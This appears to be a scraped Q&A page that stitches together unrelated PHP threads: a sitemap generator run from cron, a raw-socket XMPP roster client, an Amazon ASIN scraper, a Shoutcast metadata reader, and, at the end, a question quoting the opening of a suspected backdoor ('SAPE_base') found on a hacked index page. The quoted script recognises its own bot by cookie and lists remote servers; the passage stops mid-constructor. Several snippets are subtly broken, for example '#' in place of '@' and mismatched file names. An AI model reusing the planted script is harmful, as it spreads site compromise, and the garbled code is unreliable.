I want to create a sitemap for a page with more than 30.000.000 pages. The page is daily updating, removing and adding new pages.
I found this php script which I would like to run with a cron job.
Sitemap php script
I have all URIs in the table "myuri" in the column "uri" entries are written e.g. "/this-is-a-page.html". What parameters do I need to add to the script to get it running on my table?
<?php
/*
* author: Kyle Gadd
* documentation: http://www.php-ease.com/classes/sitemap.html
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
class Sitemap {
private $compress;
private $page = 'index';
private $index = 1;
private $count = 1;
private $urls = array();
public function __construct ($compress=true) {
ini_set('memory_limit', '75M'); // 50M required per tests
$this->compress = ($compress) ? '.gz' : '';
}
public function page ($name) {
$this->save();
$this->page = $name;
$this->index = 1;
}
public function url ($url, $lastmod='', $changefreq='', $priority='') {
$url = htmlspecialchars(BASE_URL . $url);
$lastmod = (!empty($lastmod)) ? date('Y-m-d', strtotime($lastmod)) : false;
$changefreq = (!empty($changefreq) && in_array(strtolower($changefreq), array('always', 'hourly', 'daily', 'weekly', 'monthly', 'yearly', 'never'))) ? strtolower($changefreq) : false;
$priority = (!empty($priority) && is_numeric($priority) && abs($priority) <= 1) ? round(abs($priority), 1) : false;
if (!$lastmod && !$changefreq && !$priority) {
$this->urls[] = $url;
} else {
$url = array('loc'=>$url);
if ($lastmod !== false) $url['lastmod'] = $lastmod;
if ($changefreq !== false) $url['changefreq'] = $changefreq;
if ($priority !== false) $url['priority'] = ($priority < 1) ? $priority : '1.0';
$this->urls[] = $url;
}
if ($this->count == 50000) {
$this->save();
} else {
$this->count++;
}
}
public function close() {
$this->save();
$this->ping_search_engines();
}
private function save () {
if (empty($this->urls)) return;
$file = "sitemap-{$this->page}-{$this->index}.xml{$this->compress}";
$xml = '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
$xml .= '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";
foreach ($this->urls as $url) {
$xml .= ' <url>' . "\n";
if (is_array($url)) {
foreach ($url as $key => $value) $xml .= " <{$key}>{$value}</{$key}>\n";
} else {
$xml .= " <loc>{$url}</loc>\n";
}
$xml .= ' </url>' . "\n";
}
$xml .= '</urlset>' . "\n";
$this->urls = array();
if (!empty($this->compress)) $xml = gzencode($xml, 9);
$fp = fopen(BASE_URI . $file, 'wb');
fwrite($fp, $xml);
fclose($fp);
$this->index++;
$this->count = 1;
$num = $this->index; // should have already been incremented
while (file_exists(BASE_URI . "sitemap-{$this->page}-{$num}.xml{$this->compress}")) {
unlink(BASE_URI . "sitemap-{$this->page}-{$num}.xml{$this->compress}");
$num++;
}
$this->index($file);
}
private function index ($file) {
$sitemaps = array();
$index = "sitemap-index.xml{$this->compress}";
if (file_exists(BASE_URI . $index)) {
$xml = (!empty($this->compress)) ? gzfile(BASE_URI . $index) : file(BASE_URI . $index);
$tags = $this->xml_tag(implode('', $xml), array('sitemap'));
foreach ($tags as $xml) {
$loc = str_replace(BASE_URL, '', $this->xml_tag($xml, 'loc'));
$lastmod = $this->xml_tag($xml, 'lastmod');
$lastmod = ($lastmod) ? date('Y-m-d', strtotime($lastmod)) : date('Y-m-d');
if (file_exists(BASE_URI . $loc)) $sitemaps[$loc] = $lastmod;
}
}
$sitemaps[$file] = date('Y-m-d');
$xml = '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
$xml .= '<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";
foreach ($sitemaps as $loc => $lastmod) {
$xml .= ' <sitemap>' . "\n";
$xml .= ' <loc>' . BASE_URL . $loc . '</loc>' . "\n";
$xml .= ' <lastmod>' . $lastmod . '</lastmod>' . "\n";
$xml .= ' </sitemap>' . "\n";
}
$xml .= '</sitemapindex>' . "\n";
if (!empty($this->compress)) $xml = gzencode($xml, 9);
$fp = fopen(BASE_URI . $index, 'wb');
fwrite($fp, $xml);
fclose($fp);
}
private function xml_tag ($xml, $tag, &$end='') {
if (is_array($tag)) {
$tags = array();
while ($value = $this->xml_tag($xml, $tag[0], $end)) {
$tags[] = $value;
$xml = substr($xml, $end);
}
return $tags;
}
$pos = strpos($xml, "<{$tag}>");
if ($pos === false) return false;
$start = strpos($xml, '>', $pos) + 1;
$length = strpos($xml, "</{$tag}>", $start) - $start;
$end = strpos($xml, '>', $start + $length) + 1;
return ($end !== false) ? substr($xml, $start, $length) : false;
}
public function ping_search_engines () {
$sitemap = BASE_URL . 'sitemap-index.xml' . $this->compress;
$engines = array();
$engines['www.google.com'] = '/webmasters/tools/ping?sitemap=' . urlencode($sitemap);
$engines['www.bing.com'] = '/webmaster/ping.aspx?siteMap=' . urlencode($sitemap);
$engines['submissions.ask.com'] = '/ping?sitemap=' . urlencode($sitemap);
foreach ($engines as $host => $path) {
if ($fp = fsockopen($host, 80)) {
$send = "HEAD $path HTTP/1.1\r\n";
$send .= "HOST: $host\r\n";
$send .= "CONNECTION: Close\r\n\r\n";
fwrite($fp, $send);
$http_response = fgets($fp, 128);
fclose($fp);
list($response, $code) = explode (' ', $http_response);
if ($code != 200) trigger_error ("{$host} ping was unsuccessful.<br />Code: {$code}<br />Response: {$response}");
}
}
}
public function __destruct () {
$this->save();
}
}
?>
There is already an example of usage on the page:
<?php
require_once ('php/classes/Sitemap.php');
$sitemap = new Sitemap;
if (get('pages')) {
$sitemap->page('pages');
$result = db_query ("SELECT url, created FROM pages"); // 20 pages
while (list($url, $created) = $result->fetch_row()) {
$sitemap->url($url, $created, 'yearly');
}
}
if (get('posts')) {
$sitemap->page('posts');
$result = db_query ("SELECT url, updated FROM posts"); // 70,000 posts
while (list($url, $updated) = $result->fetch_row()) {
$sitemap->url($url, $updated, 'monthly');
}
}
$sitemap->close();
unset ($sitemap);
function get ($name) {
return (isset($_GET['update']) && strpos($_GET['update'], $name) !== false) ? true : false;
}
?>
I would change this part....
if (get('pages')) {
$sitemap->page('pages');
$result = db_query ("SELECT uri FROM myuri");
while (list($url) = mysql_fetch_row($result)) {
$sitemap->url($url,'', 'yearly');
}
}
Not sure if that $updated is needed? Looks like the function just defaults it to an empty string anyways...... But maybe you could at a timestamp column to your table to pull the last updated date as well, and feed it into the function where I put ''.
Also....remove this part...
if (get('posts')) {
$sitemap->page('posts');
$result = db_query ("SELECT url, updated FROM posts"); // 70,000 posts
while (list($url, $updated) = $result->fetch_row()) {
$sitemap->url($url, $updated, 'monthly');
}
}
Related
And I can't use composer (the server is behind a firewall, and PHP-download.com does not work)
In particular, I need to export the user list with their groups
I have tried https://code.google.com/archive/p/xmpphp/ but it is not compatible with PHP 7
So you can't use composer on the server OK but why you don't use composer on your machine load the dependencies and upload the vendor folder. Then you have all you need.
Composer download all dependencies to the vendor folder and generate some autoloading files. When you upload the hole project it should work.
$server = "SERVER NAME HERE";
$username = "USER NAME HERE";
$password = "PASSWORD HERE";
$resource = "globe";
$streamid = "";
function vardump($data, $title = false){
if($title){
echo '<H2>' . $title . '</H2>';
}
echo '<PRE>';
var_dump($data);
echo '</PRE>';
}
function open_connection($server) {
$connection = fsockopen($server, 5222, $errno, $errstr);
if (!$connection) {
print "$errstr ($errno)<br>";
return false;
}
return $connection;
}
function send_xml($connection, $xml) {
fwrite($connection, $xml);
}
function textcontains($text, $searchfor, $or = false){
return stripos($text, $searchfor) !== false;
}
function send_recv_xml($connection, $xml, $size = 4096) {
send_xml($connection, $xml);
$data = recv_xml($connection, $size);
$data["sent_xml"] = $xml;
$data["sent_html"] = htmlspecialchars($xml);
return $data;
}
function fread_untildone($connection, $size = 4096){
$content = '';
if($size < 0){
while(!textcontains($content, '</iq>')){
$content .= fread($connection, abs($size));
}
} else {
$content = fread($connection, $size);
}
/*while(!feof($connection)){//did not work
$content .= fread($connection, $size);
}*/
return $content;
}
function recv_xml($connection, $size = 4096) {
$xml = fread_untildone($connection, $size);
if ($xml === "") {
return null;
}
// parses xml
$xml_parser = xml_parser_create();
xml_parse_into_struct($xml_parser, $xml, $val, $index);
xml_parser_free($xml_parser);
$RET = array($val, $index);
$RET["originaldata"] = $xml;
$RET["specialdata"] = htmlspecialchars($xml);
$RET["time"] = time();
return $RET;
}
function find_xmpp($connection, $tag, $value=null, &$ret=null) {
static $val = null, $index = null;
do {
if ($val === null && $index === null) {
list($val, $index) = recv_xml($connection);
if ($val === null || $index === null) {
return false;
}
}
foreach ($index as $tag_key => $tag_array) {
if ($tag_key === $tag) {
if ($value === null) {
if (isset($val[$tag_array[0]]['value'])) {
$ret = $val[$tag_array[0]]['value'];
}
return true;
}
foreach ($tag_array as $i => $pos) {
if ($val[$pos]['tag'] === $tag && isset($val[$pos]['value']) &&
$val[$pos]['value'] === $value) {
$ret = $val[$pos]['value'];
return true;
}
}
}
}
$val = $index = null;
} while (!feof($connection));
return false;
}
function xmpp_connect($server, $username, $password, $resource = "globe") {
global $streamid;
$connection = open_connection($server);
if (!$connection) {
return false;
}
send_xml($connection, '<stream:stream xmlns:stream="http://etherx.jabber.org/streams" version="1.0" xmlns="jabber:client" to="' . $server . '" xml:lang="en" xmlns:xml="http://www.w3.org/XML/1998/namespace">');
$data = recv_xml($connection);
$streamid = $data[0][0]["attributes"]["ID"];
//vardump($streamid, "stream id:");
send_xml($connection, '<iq type="get" to="' . $server . '" id="auth1"><query xmlns="jabber:iq:auth"><username>' . $username . '</username></query></iq>');
$data = recv_xml($connection);
$XML = '<iq type="set" id="auth2"><query xmlns="jabber:iq:auth">';
$fields = [];
foreach($data[1] as $KEY => $VALUE){
$KEY = strtolower($KEY);
switch($KEY){
case "username": $VALUE = $username; break;
case "password": $VALUE = $password; break;
case "digest": $VALUE = strtolower(sha1($streamid . $password)); break;
case "resource": $VALUE = $resource; break;
default: $VALUE = "";
}
$fields[ $KEY ] = $VALUE;
if($VALUE){
$XML .= '<' . $KEY . '>' . $VALUE . '</' . $KEY . '>';
}
}
$XML .= '</query></iq>';
//vardump($fields, "auth");
$data = send_recv_xml($connection, $XML);
//vardump($data, 'login');
return $connection;
}
function xmpp_enum_users($connection, $server, $username, $resource = "globe"){
//$XML = '<iq from="' . $username . '#' . $server . '/' . $resource . '" id="get-registered-users-list-1" to="' . $server . '" type="set" xml:lang="en">';
//$XML .= '<command xmlns="http://jabber.org/protocol/commands" action="execute" node="http://jabber.org/protocol/admin#get-registered-users-list"/></iq>';
/*$XML = '<iq from="' . $username . '" type="result" to="' . $username . '#' . $server . '/' . $resource . '" id="123">
<query xmlns="http://jabber.org/protocol/disco#items">
<item jid="conference.localhost" />
<item jid="pubsub.localhost" />
<item jid="riot.localhost" />
<item jid="vjud.localhost" />
<item node="announce" name="Announcements" jid="localhost" />
<item node="config" name="Configuration" jid="localhost" />
<item node="user" name="User Management" jid="localhost" />
<item node="online users" name="Online Users" jid="localhost" />
<item node="all users" name="All Users" jid="localhost" />
<item node="outgoing s2s" name="Outgoing s2s Connections" jid="localhost" />
<item node="running nodes" name="Running Nodes" jid="localhost" />
<item node="stopped nodes" name="Stopped Nodes" jid="localhost" />
</query></iq>';*/
global $streamid;
$XML = '<iq from="' . $username . '#' . $server . '/' . $resource . '" id="' . $streamid . '" type="get"><query xmlns="jabber:iq:roster"/></iq>';
return send_recv_xml($connection, $XML, -4096);
}
function xmpp_disconnect($connection){
fclose($connection);
}
$connection = xmpp_connect($server, $username, $password, $resource);
$data = xmpp_enum_users($connection, $server, $username, $resource);
$xml = simplexml_load_string($data["originaldata"]);
$users = [];
foreach($xml->query->item as $user){
$username = $user->attributes()->name;
$group = $user->group[0];
$users[$username] = $group;
}
vardump($users, "users");
echo '<HR>' . json_encode($users);
echo '<HR>';
foreach($users as $username => $group){
echo $username . '=' . $group . '<BR>';
}
xmpp_disconnect($connection);
This is the start of an XMPP client. It took a while to find the base code to connect, and I noticed other people asking for this but not getting it.
I'm trying to scrape Amazon ASIN codes using the below code:
<?php
class Scraper {
const BASE_URL = "http://www.amazon.com";
private $categoryFile = "";
private $outputFile = "";
private $catArray;
private $currentPage = NULL;
private $asin = array();
private $categoriesMatched = 0;
private $categoryProducts = array();
private $pagesMatched = 0;
private $totalPagesMatched = 0;
private $productsMatched = 0;
public function __construct($categoryFile, $outputFile) {
$this->categoryFile = $categoryFile;
$this->outputFile = $outputFile;
}
public function run() {
$this->readCategories($this->categoryFile);
$this->setupASINArray($this->asin);
$x = 1;
foreach ($this->catArray as $cat) {
$this->categoryProducts["$x"] = 0;
if ($this->currentPage == NULL) {
$this->currentPage = $cat;
$this->scrapeASIN($this->currentPage, $x);
$this->pagesMatched++;
}
if ($this->getNextPageLink($this->currentPage)) {
do {
// next page found
$this->pagesMatched++;
$this->scrapeASIN($this->currentPage, $x);
} while ($this->getNextPageLink($this->currentPage));
}
echo "Category complete: $this->pagesMatched Pages" . "\n";
$this->totalPagesMatched += $this->pagesMatched;
$this->pagesMatched = 0;
$this->writeASIN($this->outputFile, $x);
$x++;
$this->currentPage = NULL;
$this->categoriesMatched++;
}
$this->returnStats();
}
private function readCategories($categoryFile) {
$catArray = file($categoryFile, FILE_IGNORE_NEW_LINES);
$this->catArray = $catArray;
}
private function setupASINArray($asinArray) {
$x = 0;
foreach ($this->catArray as $cat) {
$asinArray["$x"][0] = "$cat";
$x++;
}
$this->asin = $asinArray;
}
private function getNextPageLink($currentPage) {
$document = new DOMDocument();
$html = file_get_contents($currentPage);
#$document->loadHTML($html);
$xpath = new DOMXPath($document);
$element = $xpath->query("//a[#id='pagnNextLink']/#href");
if ($element->length != 0) {
$this->currentPage = self::BASE_URL . $element->item(0)->value;
return true;
} else {
return false;
}
}
private function scrapeASIN($currentPage, $catNo) {
$html = file_get_contents($currentPage);
$regex = '~(?:www\.)?ama?zo?n\.(?:com|ca|co\.uk|co\.jp|de|fr)/(?:exec/obidos/ASIN/|o/|gp/product/|(?:(?:[^"\'/]*)/)?dp/|)(B[A-Z0-9]{9})(?:(?:/|\?|\#)(?:[^"\'\s]*))?~isx';
preg_match_all($regex, $html, $asin);
foreach ($asin[1] as $match) {
$this->asin[$catNo-1][] = $match;
}
}
private function writeASIN($outputFile, $catNo) {
$fh = fopen($outputFile, "a+");
$this->fixDupes($catNo);
$this->productsMatched += (count($this->asin[$catNo-1]) - 1);
$this->categoryProducts["$catNo"] = (count($this->asin[$catNo-1]) - 1);
flock($fh, LOCK_EX);
$x = 0;
foreach ($this->asin[$catNo-1] as $asin) {
fwrite($fh, "$asin" . "\n");
$x++;
}
flock($fh, LOCK_UN);
fclose($fh);
$x -= 1;
echo "$x ASIN codes written to file" . "\n";
}
private function fixDupes($catNo) {
$this->asin[$catNo-1] = array_unique($this->asin[$catNo-1], SORT_STRING);
}
public function returnStats() {
echo "Categories matched: " . $this->categoriesMatched . "\n";
echo "Pages parsed: " . $this->totalPagesMatched . "\n";
echo "Products parsed: " . $this->productsMatched . "\n";
echo "Category breakdown:" . "\n";
$x = 1;
foreach ($this->categoryProducts as $catProds) {
echo "Category $x had $catProds products" . "\n";
$x++;
}
}
}
$scraper = new Scraper($argv[1], $argv[2]);
$scraper->run();
?>
But it works fine on XAMPP on Windows but not on Linux. Any ideas as to why this may be? Sometimes it scrapes 0 ASIN's to file, sometimes it only scrapes 1 page in a category of 400+ pages. But the output/functionality is totally fine in Windows/XAMPP.
Any thoughts would be greatly appreciated!
Cheers
- Bryce
So try to change this way, just to avoid the error messages:
private function readCategories($categoryFile) {
if (file_exists($categoryFile)) {
$catArray = file($categoryFile, FILE_IGNORE_NEW_LINES);
$this->catArray = $catArray;
} else {
echo "File ".$categoryFile.' not exists!';
$this->catArray = array();
}
}
I use a script from here to generate my sitemaps.
I can call it with the browser with http://www.example.com/sitemap.php?update=pages and its working fine.
I need to call it as shell script so that I can automate it with the windows task scheduler. But the script needs to be changed to get the variables ?update=pages. But I don't manage to change it correctly.
Could anybody help me so that I can execute the script from command line with
...\php C:\path\to\script\sitemap.php update=pages. It would also be fine for me to hardcode the variables into the script since I wont change them anyway.
define("BASE_URL", "http://www.example.com/");
define ('BASE_URI', $_SERVER['DOCUMENT_ROOT'] . '/');
class Sitemap {
private $compress;
private $page = 'index';
private $index = 1;
private $count = 1;
private $urls = array();
public function __construct ($compress=true) {
ini_set('memory_limit', '75M'); // 50M required per tests
$this->compress = ($compress) ? '.gz' : '';
}
public function page ($name) {
$this->save();
$this->page = $name;
$this->index = 1;
}
public function url ($url, $lastmod='', $changefreq='', $priority='') {
$url = htmlspecialchars(BASE_URL . 'xx' . $url);
$lastmod = (!empty($lastmod)) ? date('Y-m-d', strtotime($lastmod)) : false;
$changefreq = (!empty($changefreq) && in_array(strtolower($changefreq), array('always', 'hourly', 'daily', 'weekly', 'monthly', 'yearly', 'never'))) ? strtolower($changefreq) : false;
$priority = (!empty($priority) && is_numeric($priority) && abs($priority) <= 1) ? round(abs($priority), 1) : false;
if (!$lastmod && !$changefreq && !$priority) {
$this->urls[] = $url;
} else {
$url = array('loc'=>$url);
if ($lastmod !== false) $url['lastmod'] = $lastmod;
if ($changefreq !== false) $url['changefreq'] = $changefreq;
if ($priority !== false) $url['priority'] = ($priority < 1) ? $priority : '1.0';
$this->urls[] = $url;
}
if ($this->count == 50000) {
$this->save();
} else {
$this->count++;
}
}
public function close() {
$this->save();
}
private function save () {
if (empty($this->urls)) return;
$file = "sitemaps/xx-sitemap-{$this->page}-{$this->index}.xml{$this->compress}";
$xml = '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
$xml .= '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";
foreach ($this->urls as $url) {
$xml .= ' <url>' . "\n";
if (is_array($url)) {
foreach ($url as $key => $value) $xml .= " <{$key}>{$value}</{$key}>\n";
} else {
$xml .= " <loc>{$url}</loc>\n";
}
$xml .= ' </url>' . "\n";
}
$xml .= '</urlset>' . "\n";
$this->urls = array();
if (!empty($this->compress)) $xml = gzencode($xml, 9);
$fp = fopen(BASE_URI . $file, 'wb');
fwrite($fp, $xml);
fclose($fp);
$this->index++;
$this->count = 1;
$num = $this->index; // should have already been incremented
while (file_exists(BASE_URI . "xxb-sitemap-{$this->page}-{$num}.xml{$this->compress}")) {
unlink(BASE_URI . "xxc-sitemap-{$this->page}-{$num}.xml{$this->compress}");
$num++;
}
$this->index($file);
}
private function index ($file) {
$sitemaps = array();
$index = "sitemaps/xx-sitemap-index.xml{$this->compress}";
if (file_exists(BASE_URI . $index)) {
$xml = (!empty($this->compress)) ? gzfile(BASE_URI . $index) : file(BASE_URI . $index);
$tags = $this->xml_tag(implode('', $xml), array('sitemap'));
foreach ($tags as $xml) {
$loc = str_replace(BASE_URL, '', $this->xml_tag($xml, 'loc'));
$lastmod = $this->xml_tag($xml, 'lastmod');
$lastmod = ($lastmod) ? date('Y-m-d', strtotime($lastmod)) : date('Y-m-d');
if (file_exists(BASE_URI . $loc)) $sitemaps[$loc] = $lastmod;
}
}
$sitemaps[$file] = date('Y-m-d');
$xml = '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
$xml .= '<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";
foreach ($sitemaps as $loc => $lastmod) {
$xml .= ' <sitemap>' . "\n";
$xml .= ' <loc>' . BASE_URL . $loc . '</loc>' . "\n";
$xml .= ' <lastmod>' . $lastmod . '</lastmod>' . "\n";
$xml .= ' </sitemap>' . "\n";
}
$xml .= '</sitemapindex>' . "\n";
if (!empty($this->compress)) $xml = gzencode($xml, 9);
$fp = fopen(BASE_URI . $index, 'wb');
fwrite($fp, $xml);
fclose($fp);
}
private function xml_tag ($xml, $tag, &$end='') {
if (is_array($tag)) {
$tags = array();
while ($value = $this->xml_tag($xml, $tag[0], $end)) {
$tags[] = $value;
$xml = substr($xml, $end);
}
return $tags;
}
$pos = strpos($xml, "<{$tag}>");
if ($pos === false) return false;
$start = strpos($xml, '>', $pos) + 1;
$length = strpos($xml, "</{$tag}>", $start) - $start;
$end = strpos($xml, '>', $start + $length) + 1;
return ($end !== false) ? substr($xml, $start, $length) : false;
}
public function __destruct () {
$this->save();
}
}
// start part 2
$sitemap = new Sitemap;
if (get('pages')) {
$sitemap->page('pages');
$result = mysql_query("SELECT uri FROM app_uri");
while (list($url, $created) = mysql_fetch_row($result)) {
$sitemap->url($url, $created, 'monthly');
}
}
$sitemap->close();
unset ($sitemap);
function get ($name) {
return (isset($_GET['update']) && strpos($_GET['update'], $name) !== false) ? true : false;
}
?>
I could install wget (it's available for windows as well) and then call the url via localhost in the task scheduler script:
wget.exe "http://localhost/path/to/script.php?pages=test"
This way you wouldn't have to rewrite the php script.
Otherwise, if the script is meant for shell usage only, then pass variables via command line:
php yourscript.php variable1 variable2 ...
In the php script you can than access those variables using the $argv variable:
$variable1 = $argv[1];
$variable2 = $argv[2];
have a look on:
How to pass GET variables to php file with Shell?
which already answered the same question :).
I found a script which can extract the artist & title name from an Icecast or Shoutcast stream.
I want the script to update automatically when a song changed, at the moment its working only when i execute it. I'm new to PHP so any help will be appreciated.
Thanks!
define('CRLF', "\r\n");
class streaminfo{
public $valid = false;
public $useragent = 'Winamp 2.81';
protected $headers = array();
protected $metadata = array();
public function __construct($location){
$errno = $errstr = '';
$t = parse_url($location);
$sock = fsockopen($t['host'], $t['port'], $errno, $errstr, 5);
$path = isset($t['path'])?$t['path']:'/';
if ($sock){
$request = 'GET '.$path.' HTTP/1.0' . CRLF .
'Host: ' . $t['host'] . CRLF .
'Connection: Close' . CRLF .
'User-Agent: ' . $this->useragent . CRLF .
'Accept: */*' . CRLF .
'icy-metadata: 1'.CRLF.
'icy-prebuffer: 65536'.CRLF.
(isset($t['user'])?'Authorization: Basic '.base64_encode($t['user'].':'.$t['pass']).CRLF:'').
'X-TipOfTheDay: Winamp "Classic" rulez all of them.' . CRLF . CRLF;
if (fwrite($sock, $request)){
$theaders = $line = '';
while (!feof($sock)){
$line = fgets($sock, 4096);
if('' == trim($line)){
break;
}
$theaders .= $line;
}
$theaders = explode(CRLF, $theaders);
foreach ($theaders as $header){
$t = explode(':', $header);
if (isset($t[0]) && trim($t[0]) != ''){
$name = preg_replace('/[^a-z][^a-z0-9]*/i','', strtolower(trim($t[0])));
array_shift($t);
$value = trim(implode(':', $t));
if ($value != ''){
if (is_numeric($value)){
$this->headers[$name] = (int)$value;
}else{
$this->headers[$name] = $value;
}
}
}
}
if (!isset($this->headers['icymetaint'])){
$data = ''; $metainterval = 512;
while(!feof($sock)){
$data .= fgetc($sock);
if (strlen($data) >= $metainterval) break;
}
$this->print_data($data);
$matches = array();
preg_match_all('/([\x00-\xff]{2})\x0\x0([a-z]+)=/i', $data, $matches, PREG_OFFSET_CAPTURE);
preg_match_all('/([a-z]+)=([a-z0-9\(\)\[\]., ]+)/i', $data, $matches, PREG_SPLIT_NO_EMPTY);
echo '<pre>';var_dump($matches);echo '</pre>';
$title = $artist = '';
foreach ($matches[0] as $nr => $values){
$offset = $values[1];
$length = ord($values[0]{0}) +
(ord($values[0]{1}) * 256)+
(ord($values[0]{2}) * 256*256)+
(ord($values[0]{3}) * 256*256*256);
$info = substr($data, $offset + 4, $length);
$seperator = strpos($info, '=');
$this->metadata[substr($info, 0, $seperator)] = substr($info, $seperator + 1);
if (substr($info, 0, $seperator) == 'title') $title = substr($info, $seperator + 1);
if (substr($info, 0, $seperator) == 'artist') $artist = substr($info, $seperator + 1);
}
$this->metadata['streamtitle'] = $artist . ' - ' . $title;
}else{
$metainterval = $this->headers['icymetaint'];
$intervals = 0;
$metadata = '';
while(1){
$data = '';
while(!feof($sock)){
$data .= fgetc($sock);
if (strlen($data) >= $metainterval) break;
}
//$this->print_data($data);
$len = join(unpack('c', fgetc($sock))) * 16;
if ($len > 0){
$metadata = str_replace("\0", '', fread($sock, $len));
break;
}else{
$intervals++;
if ($intervals > 100) break;
}
}
$metarr = explode(';', $metadata);
foreach ($metarr as $meta){
$t = explode('=', $meta);
if (isset($t[0]) && trim($t[0]) != ''){
$name = preg_replace('/[^a-z][^a-z0-9]*/i','', strtolower(trim($t[0])));
array_shift($t);
$value = trim(implode('=', $t));
if (substr($value, 0, 1) == '"' || substr($value, 0, 1) == "'"){
$value = substr($value, 1);
}
if (substr($value, -1) == '"' || substr($value, -1) == "'"){
$value = substr($value, 0, -1);
}
if ($value != ''){
$this->metadata[$name] = $value;
}
}
}
}
fclose($sock);
$this->valid = true;
}else echo 'unable to write.';
}else echo 'no socket '.$errno.' - '.$errstr.'.';
}
public function print_data($data){
$data = str_split($data);
$c = 0;
$string = '';
echo "<pre>\n000000 ";
foreach ($data as $char){
$string .= addcslashes($char, "\n\r\0\t");
$hex = dechex(join(unpack('C', $char)));
if ($c % 4 == 0) echo ' ';
if ($c % (4*4) == 0 && $c != 0){
foreach (str_split($string) as $s){
//echo " $string\n";
if (ord($s) < 32 || ord($s) > 126){
echo '\\'.ord($s);
}else{
echo $s;
}
}
echo "\n";
$string = '';
echo str_pad($c, 6, '0', STR_PAD_LEFT).' ';
}
if (strlen($hex) < 1) $hex = '00';
if (strlen($hex) < 2) $hex = '0'.$hex;
echo $hex.' ';
$c++;
}
echo " $string\n</pre>";
}
public function __get($name){
if (isset($this->metadata[$name])){
return $this->metadata[$name];
}
if (isset($this->headers[$name])){
return $this->headers[$name];
}
return null;
}
}
$t = new streaminfo('http://64.236.34.196:80/stream/1014'); // get metadata
echo Meta Interval: $t->icymetaint;
echo Current Track: $t->streamtitle;
You will need to constantly query the stream at a set interval to find when the song changes.
This can be best done by scheduling a cron job.
If on Windows, you should use the Windows Task Scheduler
If you want to run the PHP script to keep your meta data up to date (I'm assuming you're making a website and using html audio tags here) you can use the ontimeupdate event with an ajax function. If you're not you probably should look up your audio playback documentation for something similar.
<audio src="http://ip:port/;" ontimeupdate="loadXMLDoc()">
You can find a great example here http://www.w3schools.com/php/php_ajax_php.asp
You want to use the PHP echo function all the relevant information at once using one php variable at the very end of your script.
<?php ....
$phpVar=$streamtitle;
$phpVar2=$streamsong;
$result="I want my string to look like this: <br> {$phpVar} {$phpVar2}";
echo $result;
?>
and then use the function called by the .onreadystatechange to modify the particular elements you want on your website by using the .resonseText (this will contain the same content as your PHP script's echo).
After SCOURING the web for 4 hours, this is the only Shoutcast metadata script I've found that works! Thankyou.
To run this constantly, why not use a setInterval combined with jQuery's AJAX call?
<script>
$(function() {
setInterval(getTrackName,16000);
});
function getTrackName() {
$.ajax({
url: "track_name.php"
})
.done(function( data ) {
$( "#results" ).text( data );
});
}
</script>
Also your last couple 'echo' lines were breaking the script for me. Just put quotes around the Meta Interval, etc....
Closed. This question is off-topic. It is not currently accepting answers.
Want to improve this question? Update the question so it's on-topic for Stack Overflow.
Closed 10 years ago.
Improve this question
I found this script attached to a modified index page. This looks like some kind of backdoor. and who is this SAPE ?
<?php
class SAPE_base {
var $_version = '1.0.8';
var $_verbose = false;
var $_charset = '';
var $_sape_charset = '';
var $_server_list = array('dispenser-01.sape.ru', 'dispenser-02.sape.ru');
var $_cache_lifetime = 3600;
var $_cache_reloadtime = 600;
var $_error = '';
var $_host = '';
var $_request_uri = '';
var $_multi_site = false;
var $_fetch_remote_type = '';
var $_socket_timeout = 6;
var $_force_show_code = false;
var $_is_our_bot = false;
var $_debug = false;
var $_ignore_case = false;
var $_db_file = '';
var $_use_server_array = false;
var $_force_update_db = false;
function SAPE_base($options = null) {
$host = '';
if (is_array($options)) {
if (isset($options['host'])) {
$host = $options['host'];
}
}
elseif (strlen($options)) {
$host = $options;
$options = array();
}
else {
$options = array();
}
if (isset($options['use_server_array']) && $options['use_server_array'] == true) {
$this->_use_server_array = true;
}
if (strlen($host)) {
$this->_host = $host;
}
else {
$this->_host = $_SERVER['HTTP_HOST'];
}
$this->_host = preg_replace('/^http:\/\//', '', $this->_host);
$this->_host = preg_replace('/^www\./', '', $this->_host);
if (isset($options['request_uri']) && strlen($options['request_uri'])) {
$this->_request_uri = $options['request_uri'];
}
elseif ($this->_use_server_array === false) {
$this->_request_uri = getenv('REQUEST_URI');
}
if (strlen($this->_request_uri) == 0) {
$this->_request_uri = $_SERVER['REQUEST_URI'];
}
if (isset($options['multi_site']) && $options['multi_site'] == true) {
$this->_multi_site = true;
}
if (isset($options['debug']) && $options['debug'] == true) {
$this->_debug = true;
}
if (isset($_COOKIE['sape_cookie']) && ($_COOKIE['sape_cookie'] == _SAPE_USER)) {
$this->_is_our_bot = true;
if (isset($_COOKIE['sape_debug']) && ($_COOKIE['sape_debug'] == 1)) {
$this->_debug = true;
$this->_options = $options;
$this->_server_request_uri = $this->_request_uri = $_SERVER['REQUEST_URI'];
$this->_getenv_request_uri = getenv('REQUEST_URI');
$this->_SAPE_USER = _SAPE_USER;
}
if (isset($_COOKIE['sape_updatedb']) && ($_COOKIE['sape_updatedb'] == 1)) {
$this->_force_update_db = true;
}
}
else {
$this->_is_our_bot = false;
}
if (isset($options['verbose']) && $options['verbose'] == true || $this->_debug) {
$this->_verbose = true;
}
if (isset($options['charset']) && strlen($options['charset'])) {
$this->_charset = $options['charset'];
}
else {
$this->_charset = 'windows-1251';
}
if (isset($options['fetch_remote_type']) && strlen($options['fetch_remote_type'])) {
$this->_fetch_remote_type = $options['fetch_remote_type'];
}
if (isset($options['socket_timeout']) && is_numeric($options['socket_timeout']) && $options['socket_timeout'] > 0) {
$this->_socket_timeout = $options['socket_timeout'];
}
if (isset($options['force_show_code']) && $options['force_show_code'] == true) {
$this->_force_show_code = true;
}
if (!defined('_SAPE_USER')) {
return $this->raise_error('Не задана константа _SAPE_USER');
